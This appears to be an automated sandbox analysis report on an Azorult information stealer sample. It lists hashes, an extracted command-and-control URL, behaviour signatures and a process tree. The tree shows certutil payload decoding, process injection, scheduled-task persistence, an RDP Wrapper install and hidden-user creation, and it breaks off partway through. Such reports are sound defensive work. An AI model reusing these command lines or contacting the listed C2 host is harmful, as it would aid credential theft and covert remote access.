Analysis
-
max time kernel
130s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 18:16
Static task
static1
Behavioral task
behavioral1
Sample
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Resource
win10v2004-20241007-en
General
-
Target
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
-
Size
3.2MB
-
MD5
7aaa757fa6b13340fa16c6c7eebb0c0f
-
SHA1
3ea1381da382411231389c8be2c1117310a8efe0
-
SHA256
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07
-
SHA512
1e372f60f5262742435ed5fddca5cf01362497b930ca614e30e3661defa74c8e2d8934926b94ae94f94c42b6d6e972afb0c3dfddb5bf7b928c4c7accc21ebe53
-
SSDEEP
98304:i1Eu7EywnDEADZ6dly16EOM8RvFs4j25wcMIn:i1ERNnDEAFwM16E+RvFs4j8w+n
Malware Config
Extracted
azorult
http://0-800-email.com/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 896 net.exe 832 net1.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 27 2416 WScript.exe 28 2416 WScript.exe 29 804 WScript.exe 30 804 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2500 powershell.exe 768 powershell.exe 1540 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 2 TTPs 6 IoCs
pid Process 2552 netsh.exe 2940 netsh.exe 1644 netsh.exe 1372 netsh.exe 2284 netsh.exe 2856 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Executes dropped EXE 11 IoCs
pid Process 2116 err.exe 2788 dos.com 2728 dos.com 2740 dos.com 2444 dos.com 3000 dos.com 1664 dos.com 1592 RDPWInst.exe 3036 RDPWInst.exe 2064 RDPWInst.exe 992 RDPWInst.exe -
Loads dropped DLL 14 IoCs
pid Process 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 2788 dos.com 2728 dos.com 2740 dos.com 1784 cmd.exe 1784 cmd.exe 1536 Process not Found 1784 cmd.exe 1784 cmd.exe 1568 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 2764 certutil.exe 2708 certutil.exe 2924 certutil.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 9 raw.githubusercontent.com 10 raw.githubusercontent.com 20 raw.githubusercontent.com 21 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\system32\CatRoot2\edb.chk svchost.exe File opened for modification C:\Windows\system32\CatRoot2\edb.log svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\dnsrsvlr.log svchost.exe File opened for modification C:\Windows\System32\asyncreg.log svchost.exe File created C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb svchost.exe File opened for modification C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb svchost.exe -
Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" reg.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2788 set thread context of 3000 2788 dos.com 41 PID 2728 set thread context of 2444 2728 dos.com 42 PID 2740 set thread context of 1664 2740 dos.com 43 -
Drops file in Program Files directory 11 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper dos.com File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat dos.com File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\plink.exe dos.com File created C:\Program Files\RDP Wrapper\RDPWInst.exe dos.com File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe dos.com File created C:\Program Files\RDP Wrapper\autoupdate.bat dos.com File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\plink.exe dos.com -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2920 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dos.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dos.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dos.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language err.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dos.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dos.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 352 timeout.exe 2444 timeout.exe 2348 timeout.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2900 schtasks.exe 2148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2788 dos.com 2728 dos.com 2740 dos.com 768 powershell.exe 1568 svchost.exe 1568 svchost.exe 1540 powershell.exe 2500 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 1536 Process not Found 2168 Process not Found 1568 svchost.exe 1568 svchost.exe 1568 svchost.exe 1568 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2164 WMIC.exe Token: SeSecurityPrivilege 2164 WMIC.exe Token: SeTakeOwnershipPrivilege 2164 WMIC.exe Token: SeLoadDriverPrivilege 2164 WMIC.exe Token: SeSystemProfilePrivilege 2164 WMIC.exe Token: SeSystemtimePrivilege 2164 WMIC.exe Token: SeProfSingleProcessPrivilege 2164 WMIC.exe Token: SeIncBasePriorityPrivilege 2164 WMIC.exe Token: SeCreatePagefilePrivilege 2164 WMIC.exe Token: SeBackupPrivilege 2164 WMIC.exe Token: SeRestorePrivilege 2164 WMIC.exe Token: SeShutdownPrivilege 2164 WMIC.exe Token: SeDebugPrivilege 2164 WMIC.exe Token: SeSystemEnvironmentPrivilege 2164 WMIC.exe Token: SeRemoteShutdownPrivilege 2164 WMIC.exe Token: SeUndockPrivilege 2164 WMIC.exe Token: SeManageVolumePrivilege 2164 WMIC.exe Token: 33 2164 WMIC.exe Token: 34 2164 WMIC.exe Token: 35 2164 WMIC.exe Token: SeIncreaseQuotaPrivilege 2164 WMIC.exe Token: SeSecurityPrivilege 2164 WMIC.exe Token: SeTakeOwnershipPrivilege 2164 WMIC.exe Token: SeLoadDriverPrivilege 2164 WMIC.exe Token: SeSystemProfilePrivilege 2164 WMIC.exe Token: SeSystemtimePrivilege 2164 WMIC.exe Token: SeProfSingleProcessPrivilege 2164 WMIC.exe Token: SeIncBasePriorityPrivilege 2164 WMIC.exe Token: SeCreatePagefilePrivilege 2164 WMIC.exe Token: SeBackupPrivilege 2164 WMIC.exe Token: SeRestorePrivilege 2164 WMIC.exe Token: SeShutdownPrivilege 2164 WMIC.exe Token: SeDebugPrivilege 2164 WMIC.exe Token: SeSystemEnvironmentPrivilege 2164 WMIC.exe Token: SeRemoteShutdownPrivilege 2164 WMIC.exe Token: SeUndockPrivilege 2164 WMIC.exe Token: SeManageVolumePrivilege 2164 WMIC.exe Token: 33 2164 WMIC.exe Token: 34 2164 WMIC.exe Token: 35 2164 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2116 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 31 PID 2360 wrote to memory of 2116 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 31 PID 2360 wrote to memory of 2116 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 31 PID 2360 wrote to memory of 2116 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 31 PID 2360 wrote to memory of 2764 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 32 PID 2360 wrote to memory of 2764 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 32 PID 2360 wrote to memory of 2764 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 32 PID 2360 wrote to memory of 2764 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 32 PID 2360 wrote to memory of 2708 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 34 PID 2360 wrote to memory of 2708 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 34 PID 2360 wrote to memory of 2708 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 34 PID 2360 wrote to memory of 2708 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 34 PID 2360 wrote to memory of 2924 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 36 PID 2360 wrote to memory of 2924 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 36 PID 2360 wrote to memory of 2924 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 36 PID 2360 wrote to memory of 2924 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 36 PID 2360 wrote to memory of 2788 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 38 PID 2360 wrote to memory of 2788 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 38 PID 2360 wrote to memory of 2788 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 38 PID 2360 wrote to memory of 2788 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 38 PID 2360 wrote to memory of 2740 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 39 PID 2360 wrote to memory of 2740 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 39 PID 2360 wrote to memory of 2740 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 39 PID 2360 wrote to memory of 2740 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 39 PID 2360 wrote to memory of 2728 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 40 PID 2360 wrote to memory of 2728 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 40 PID 2360 wrote to memory of 2728 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 40 PID 2360 wrote to memory of 2728 2360 c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe 40 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2788 wrote to memory of 3000 2788 dos.com 41 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2728 wrote to memory of 2444 2728 dos.com 42 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 2740 wrote to memory of 1664 2740 dos.com 43 PID 1664 wrote to memory of 1912 1664 dos.com 44 PID 1664 wrote to memory of 1912 1664 dos.com 44 PID 1664 wrote to memory of 1912 1664 dos.com 44 PID 1664 wrote to memory of 1912 1664 dos.com 44 PID 1912 wrote to memory of 988 1912 cmd.exe 46 PID 1912 wrote to memory of 988 1912 cmd.exe 46 PID 1912 wrote to memory of 988 1912 cmd.exe 46 PID 1912 wrote to memory of 988 1912 cmd.exe 46 PID 1664 wrote to memory of 1708 1664 dos.com 47 PID 1664 wrote to memory of 1708 1664 dos.com 47 PID 1664 wrote to memory of 1708 1664 dos.com 47 PID 1664 wrote to memory of 1708 1664 dos.com 47 PID 1708 wrote to memory of 2900 1708 cmd.exe 49 PID 1708 wrote to memory of 2900 1708 cmd.exe 49 PID 1708 wrote to memory of 2900 1708 cmd.exe 49 PID 1708 wrote to memory of 2900 1708 cmd.exe 49 PID 1664 wrote to memory of 1496 1664 dos.com 50 PID 1664 wrote to memory of 1496 1664 dos.com 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Windows\SysWOW64\certutil.exe"C:\Windows\System32\certutil.exe" -decode dera deras2⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\certutil.exe"C:\Windows\System32\certutil.exe" -decode sfera sferas2⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\certutil.exe"C:\Windows\System32\certutil.exe" -decode bruto brutos2⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2924
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" deras2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" brutos2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"5⤵
- System Location Discovery: System Language Discovery
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"4⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"5⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp4⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat MENVELaJIp iFxgLSBWge"4⤵
- System Location Discovery: System Language Discovery
PID:2952 -
